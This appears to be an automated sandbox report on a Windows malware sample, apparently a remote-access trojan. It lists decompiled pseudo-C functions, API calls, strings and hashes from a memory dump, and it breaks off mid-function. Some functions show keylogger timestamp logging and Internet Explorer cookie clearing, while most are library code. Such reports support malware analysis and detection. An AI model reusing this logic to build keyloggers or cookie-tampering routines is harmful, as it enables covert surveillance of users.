                                                                                                			E0040A43E(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020C7(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E00410911( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				E00401FC3( &_v28, 0x80000001, _t59, _t17);
				E00401FB9();
				_t58 = 0x460734;
				_t20 = E00405C1B(0x460734);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00401F87( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402076(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E00418144(E00401EDD(E00417CCA( &_v76,  &_v52)));
						E00401EE2();
						_t55 =  &_v52;
						E00401FB9();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040A748();
							if(__eflags != 0) {
								_t41 = 1;
								E00402076(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0040A724(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402076(_t41, _t48);
					E0040A724(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				E00401FB9();
				return _t41;
			}





















                                                                                                0x0040a447
                                                                                                0x0040a44c
                                                                                                0x0040a451
                                                                                                0x0040a464
                                                                                                0x0040a466
                                                                                                0x0040a46b
                                                                                                0x0040a472
                                                                                                0x0040a47a
                                                                                                0x0040a47f
                                                                                                0x0040a487
                                                                                                0x0040a48c
                                                                                                0x0040a48e
                                                                                                0x0040a4c0
                                                                                                0x0040a4d3
                                                                                                0x0040a4d5
                                                                                                0x00000000
                                                                                                0x0040a4d7
                                                                                                0x0040a4e1
                                                                                                0x0040a4e6
                                                                                                0x0040a4fa
                                                                                                0x0040a504
                                                                                                0x0040a509
                                                                                                0x0040a50c
                                                                                                0x0040a511
                                                                                                0x0040a513
                                                                                                0x0040a524
                                                                                                0x0040a525
                                                                                                0x0040a52b
                                                                                                0x0040a52d
                                                                                                0x0040a532
                                                                                                0x0040a53b
                                                                                                0x0040a540
                                                                                                0x00000000
                                                                                                0x0040a540
                                                                                                0x0040a515
                                                                                                0x0040a518
                                                                                                0x0040a51a
                                                                                                0x00000000
                                                                                                0x0040a51a
                                                                                                0x0040a513
                                                                                                0x0040a490
                                                                                                0x0040a490
                                                                                                0x0040a493
                                                                                                0x0040a495
                                                                                                0x0040a49a
                                                                                                0x0040a49a
                                                                                                0x0040a49f
                                                                                                0x0040a4a4
                                                                                                0x0040a545
                                                                                                0x0040a545
                                                                                                0x0040a54b
                                                                                                0x0040a557

                                                                                                APIs
                                                                                                  • Part of subcall function 00410911: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410933
                                                                                                  • Part of subcall function 00410911: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410952
                                                                                                  • Part of subcall function 00410911: RegCloseKey.ADVAPI32(?), ref: 0041095B
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A4C0
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040A4CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: f76f05ecf2ca6275e224ca6f73b952736a389c26319c30d3baf065610a948902
                                                                                                • Instruction ID: 9a7e97995817d627765e2276035d41f6b7085d8684995917a71da6fb3efd3936
                                                                                                • Opcode Fuzzy Hash: f76f05ecf2ca6275e224ca6f73b952736a389c26319c30d3baf065610a948902
                                                                                                • Instruction Fuzzy Hash: 2C219E71A5021966CB04F7A2CC5ADEE7368AF50308F40013FB902772D2EFBD9959C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0045136D, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E0045136D(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00443334(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00440C6C(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E004388FC(GetLastError());
								}
							}
							E004414D5(_t40);
							_t14 = _t35;
						} else {
							E004388FC(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00438932())) = 0x16;
						E00437709();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00438932())) = 0x16;
				E00437709();
				return 0;
			}
















                                                                                                0x00451372
                                                                                                0x00451377
                                                                                                0x00451391
                                                                                                0x00451394
                                                                                                0x00451396
                                                                                                0x004513af
                                                                                                0x004513b1
                                                                                                0x004513b8
                                                                                                0x004513ba
                                                                                                0x004513c3
                                                                                                0x004513c4
                                                                                                0x004513c8
                                                                                                0x004513ce
                                                                                                0x004513d1
                                                                                                0x004513d3
                                                                                                0x004513ed
                                                                                                0x004513f0
                                                                                                0x004513f2
                                                                                                0x004513ff
                                                                                                0x00451405
                                                                                                0x00451407
                                                                                                0x0045141b
                                                                                                0x0045141d
                                                                                                0x00451421
                                                                                                0x00451421
                                                                                                0x00451422
                                                                                                0x00451409
                                                                                                0x00451410
                                                                                                0x00451415
                                                                                                0x00451407
                                                                                                0x00451425
                                                                                                0x0045142a
                                                                                                0x004513d5
                                                                                                0x004513dc
                                                                                                0x004513e1
                                                                                                0x004513e1
                                                                                                0x00451398
                                                                                                0x0045139d
                                                                                                0x004513a3
                                                                                                0x004513a8
                                                                                                0x004513a8
                                                                                                0x00000000
                                                                                                0x0045142f
                                                                                                0x0045137e
                                                                                                0x00451384
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 48723f8299538c5f45eee52e63c0ecab235c55e9929719d0ad3ede01aa6c63f6
                                                                                                • Instruction ID: 8b9e5de4d639c6005189855640ed023597854485a42c717030aa09de08397672
                                                                                                • Opcode Fuzzy Hash: 48723f8299538c5f45eee52e63c0ecab235c55e9929719d0ad3ede01aa6c63f6
                                                                                                • Instruction Fuzzy Hash: 07112771504225BFDB202FB79C04A6F7A6CEF86766F10526FFC11C7262DE3888418669
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040E82F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E0040E82F(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00430DB5( &_v12, 0);
				_t48 =  *0x46fcd8;
				_v8 = _t48;
				_t51 = E0040BA47(_a4, E0040B970(0x46d130));
				if(_t51 != 0) {
					L5:
					E00430E0D( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040BB79(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040B836( &_v24);
							E00432EDA( &_v24, 0x46976c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x46fccc -  *((intOrPtr*)(_t40 + 4));
							if( *0x46fccc >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E0042FE69(0x46fccc);
								__eflags =  *0x46fccc - 0xffffffff;
								if( *0x46fccc == 0xffffffff) {
									E0040EBE6();
									E004301F3(__eflags, 0x453a17);
									E0042FE2A(0x46fccc, 0x46fccc);
								}
							}
							return 0x46fcd0;
						} else {
							_t51 = _v8;
							 *0x46fcd8 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00430FC6(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}










                                                                                                0x0040e83c
                                                                                                0x0040e841
                                                                                                0x0040e84c
                                                                                                0x0040e85d
                                                                                                0x0040e861
                                                                                                0x0040e895
                                                                                                0x0040e898
                                                                                                0x0040e8a4
                                                                                                0x0040e863
                                                                                                0x0040e865
                                                                                                0x0040e879
                                                                                                0x0040e87c
                                                                                                0x0040e8a8
                                                                                                0x0040e8b6
                                                                                                0x0040e8bb
                                                                                                0x0040e8c2
                                                                                                0x0040e8c9
                                                                                                0x0040e8cf
                                                                                                0x0040e8d1
                                                                                                0x0040e8d8
                                                                                                0x0040e8dd
                                                                                                0x0040e8e5
                                                                                                0x0040e8e7
                                                                                                0x0040e8f1
                                                                                                0x0040e8f7
                                                                                                0x0040e8fd
                                                                                                0x0040e8fe
                                                                                                0x0040e904
                                                                                                0x0040e87e
                                                                                                0x0040e87e
                                                                                                0x0040e883
                                                                                                0x0040e88b
                                                                                                0x0040e88f
                                                                                                0x00000000
                                                                                                0x0040e894
                                                                                                0x0040e867
                                                                                                0x0040e867
                                                                                                0x00000000
                                                                                                0x0040e867
                                                                                                0x0040e865

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040E83C
                                                                                                • int.LIBCPMT ref: 0040E84F
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::_Lockit.LIBCPMT ref: 0040B981
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B99B
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040E858
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040E88F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E898
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E8B6
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040E8F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2409581025-0
                                                                                                • Opcode ID: 7f3499ab472a94073dda60883e607865e1961136344be8347b4299be4defa888
                                                                                                • Instruction ID: eccdf18d5aabaf102b0185edd20112d33c9fd6b2d3665569ab00c68a80b96d02
                                                                                                • Opcode Fuzzy Hash: 7f3499ab472a94073dda60883e607865e1961136344be8347b4299be4defa888
                                                                                                • Instruction Fuzzy Hash: 3221D3329042149BCB10FB6AE812D9E3368AF44324F20457BF900A73D1EF78AD45879D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040964B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E0040964B(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				E00401EEC( &_a4, _t26, _t67, E00403098(__ebx,  &_v44, E00409E9E( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				E00401EE2();
				E00401EE2();
				_push(0x64 + E0040247B() * 2);
				_t33 = E0043776E( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, E00401EDD( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					_t19 = _t67 + 4; // 0x46e3b4
					E0040778C(__ebx, _t19, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					_t21 = _t67 + 0x1c; // 0x46e3cc
					E0040778C(_t42, _t21, _t66, _t66);
					_t22 = _t67 + 0x3c; // 0x0
					SetEvent( *_t22);
				}
				L00437769(_t66);
				return E00401EE2();
			}












                                                                                                0x0040964b
                                                                                                0x0040964b
                                                                                                0x00409656
                                                                                                0x00409659
                                                                                                0x00409685
                                                                                                0x0040968d
                                                                                                0x00409695
                                                                                                0x004096a9
                                                                                                0x004096aa
                                                                                                0x004096b4
                                                                                                0x004096ba
                                                                                                0x004096bf
                                                                                                0x004096c4
                                                                                                0x004096c9
                                                                                                0x004096ce
                                                                                                0x004096cf
                                                                                                0x004096da
                                                                                                0x004096e7
                                                                                                0x004096ea
                                                                                                0x004096ed
                                                                                                0x004096ed
                                                                                                0x004096f6
                                                                                                0x004096f9
                                                                                                0x004096fc
                                                                                                0x00409701
                                                                                                0x00409704
                                                                                                0x00409704
                                                                                                0x0040970b
                                                                                                0x0040971e

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                • wsprintfW.USER32 ref: 004096DA
                                                                                                • SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimechar_traitswsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                • API String ID: 3003339404-248792730
                                                                                                • Opcode ID: 124a85308ca917346ab859ccfcbe3ce9a8dddb18d146cd7b34b0f7e922693c53
                                                                                                • Instruction ID: 00f7add78b72f6bc9c174c84cf5df4f94eedd2ef65b0447474714796a340b4ae
                                                                                                • Opcode Fuzzy Hash: 124a85308ca917346ab859ccfcbe3ce9a8dddb18d146cd7b34b0f7e922693c53
                                                                                                • Instruction Fuzzy Hash: F0217771404218AAC728FB95EC959FF77BCAF44705F10412FF942621D1EF78AA85C6A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00417909, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71sleeplibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 45%
                                                                                                			E00417909(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E004179BE( &_v12);
				_t26 = E004179BE( &_v20);
				asm("sbb ebx, edx");
				_t27 = E004179BE( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E004179BE( &_v36);
				asm("adc ebx, edx");
				_t29 = E004179BE( &_v44);
				asm("sbb esi, edx");
				_t30 = E004179BE( &_v52);
				asm("adc esi, edx");
				return E00451A20(E004519E0(_t25 - _t26 - _t27 + E004179BE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

















                                                                                                0x00417909
                                                                                                0x00417929
                                                                                                0x00417937
                                                                                                0x0041793e
                                                                                                0x00417950
                                                                                                0x00417955
                                                                                                0x00417961
                                                                                                0x0041796b
                                                                                                0x0041796d
                                                                                                0x00417977
                                                                                                0x00417983
                                                                                                0x00417986
                                                                                                0x00417988
                                                                                                0x00417996
                                                                                                0x00417998
                                                                                                0x004179a3
                                                                                                0x004179bd

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00413FDF), ref: 0041791C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00417923
                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,00413FDF,00000095,00413CCF), ref: 0041793E
                                                                                                • __aulldiv.LIBCMT ref: 004179B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcSleep__aulldiv
                                                                                                • String ID: GetSystemTimes$kernel32.dll
                                                                                                • API String ID: 482274533-1354958348
                                                                                                • Opcode ID: 12ca6f9477a78f7cb3c104a0e321c35be10d34246413cac5a6ffe2463fed2f16
                                                                                                • Instruction ID: b18f39f10b1a1eca4fc1da17fdf7418cf276cd6217e84e4c30b5c321a7763ce1
                                                                                                • Opcode Fuzzy Hash: 12ca6f9477a78f7cb3c104a0e321c35be10d34246413cac5a6ffe2463fed2f16
                                                                                                • Instruction Fuzzy Hash: 6F1187B7D002286BD710E7F5CC85DEF7B7CEB88754F15062AF906A3141ED34994886A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044A3CA, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0044A3CA(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0044A111(_t45, 7);
					E0044A111(_t45 + 0x1c, 7);
					E0044A111(_t45 + 0x38, 0xc);
					E0044A111(_t45 + 0x68, 0xc);
					E0044A111(_t45 + 0x98, 2);
					E004414D5( *((intOrPtr*)(_t45 + 0xa0)));
					E004414D5( *((intOrPtr*)(_t45 + 0xa4)));
					E004414D5( *((intOrPtr*)(_t45 + 0xa8)));
					E0044A111(_t45 + 0xb4, 7);
					E0044A111(_t45 + 0xd0, 7);
					E0044A111(_t45 + 0xec, 0xc);
					E0044A111(_t45 + 0x11c, 0xc);
					E0044A111(_t45 + 0x14c, 2);
					E004414D5( *((intOrPtr*)(_t45 + 0x154)));
					E004414D5( *((intOrPtr*)(_t45 + 0x158)));
					E004414D5( *((intOrPtr*)(_t45 + 0x15c)));
					return E004414D5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                0x0044a3d0
                                                                                                0x0044a3d5
                                                                                                0x0044a3de
                                                                                                0x0044a3e9
                                                                                                0x0044a3f4
                                                                                                0x0044a3ff
                                                                                                0x0044a40d
                                                                                                0x0044a418
                                                                                                0x0044a423
                                                                                                0x0044a42e
                                                                                                0x0044a43c
                                                                                                0x0044a44a
                                                                                                0x0044a45b
                                                                                                0x0044a469
                                                                                                0x0044a477
                                                                                                0x0044a482
                                                                                                0x0044a48d
                                                                                                0x0044a498
                                                                                                0x00000000
                                                                                                0x0044a4a8
                                                                                                0x0044a4ad

                                                                                                APIs
                                                                                                  • Part of subcall function 0044A111: _free.LIBCMT ref: 0044A13A
                                                                                                • _free.LIBCMT ref: 0044A418
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0044A423
                                                                                                • _free.LIBCMT ref: 0044A42E
                                                                                                • _free.LIBCMT ref: 0044A482
                                                                                                • _free.LIBCMT ref: 0044A48D
                                                                                                • _free.LIBCMT ref: 0044A498
                                                                                                • _free.LIBCMT ref: 0044A4A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 350cd5c5e75e0b3c7ffa76abe806caf01568d77e9248ea2d15b607fbb4e673b9
                                                                                                • Instruction ID: c32a0f68d486d61368fb4e52bc705447b500b86be3810096fddbb78fab01a896
                                                                                                • Opcode Fuzzy Hash: 350cd5c5e75e0b3c7ffa76abe806caf01568d77e9248ea2d15b607fbb4e673b9
                                                                                                • Instruction Fuzzy Hash: E7119631681704BAFB20BBB2CC0BFCBB7AC9F04715F40481EB29A6A063DA7CB5544755
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040EB3E, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E0040EB3E(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v28;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;

				E00430DB5( &_v12, 0);
				_t39 =  *0x46fcdc;
				_v8 = _t39;
				_t41 = E0040BA47(_a4, E0040B970(0x46fed0));
				if(_t41 != 0) {
					L5:
					E00430E0D( &_v12);
					return _t41;
				} else {
					if(_t39 == 0) {
						__eflags = E0040EC05(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t34 =  &_v28;
							E0040B836(_t34);
							E00432EDA( &_v28, 0x46976c);
							asm("int3");
							_push(_t41);
							_t42 = _t34;
							E0040B717(_t34, _v36);
							 *_t42 = 0x4552b0;
							return _t42;
						} else {
							_t41 = _v8;
							 *0x46fcdc = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E00430FC6(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t39;
						goto L5;
					}
				}
			}











                                                                                                0x0040eb4b
                                                                                                0x0040eb50
                                                                                                0x0040eb5b
                                                                                                0x0040eb6c
                                                                                                0x0040eb70
                                                                                                0x0040eba4
                                                                                                0x0040eba7
                                                                                                0x0040ebb3
                                                                                                0x0040eb72
                                                                                                0x0040eb74
                                                                                                0x0040eb88
                                                                                                0x0040eb8b
                                                                                                0x0040ebb4
                                                                                                0x0040ebb7
                                                                                                0x0040ebc5
                                                                                                0x0040ebca
                                                                                                0x0040ebce
                                                                                                0x0040ebd2
                                                                                                0x0040ebd4
                                                                                                0x0040ebd9
                                                                                                0x0040ebe3
                                                                                                0x0040eb8d
                                                                                                0x0040eb8d
                                                                                                0x0040eb92
                                                                                                0x0040eb9a
                                                                                                0x0040eb9e
                                                                                                0x00000000
                                                                                                0x0040eba3
                                                                                                0x0040eb76
                                                                                                0x0040eb76
                                                                                                0x00000000
                                                                                                0x0040eb76
                                                                                                0x0040eb74

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040EB4B
                                                                                                • int.LIBCPMT ref: 0040EB5E
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::_Lockit.LIBCPMT ref: 0040B981
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B99B
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040EB67
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040EB9E
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040EBA7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040EBC5
                                                                                                • std::exception::exception.LIBCMT ref: 0040EBD4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2287991272-0
                                                                                                • Opcode ID: 57cc110876432828a9b5b0328f193f96949d19d2348f950401bef0651b0c8872
                                                                                                • Instruction ID: e62e307065ba950afa48a532fdba49c3a9622a511802fea998c4c84199daa842
                                                                                                • Opcode Fuzzy Hash: 57cc110876432828a9b5b0328f193f96949d19d2348f950401bef0651b0c8872
                                                                                                • Instruction Fuzzy Hash: 2111B632500118ABCB10EB9AD801D9E7B78DF44364F10057BF905A7391EF78AE008BD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00435E08, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00435E08(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46c090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00432A58(__eflags,  *0x46c090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
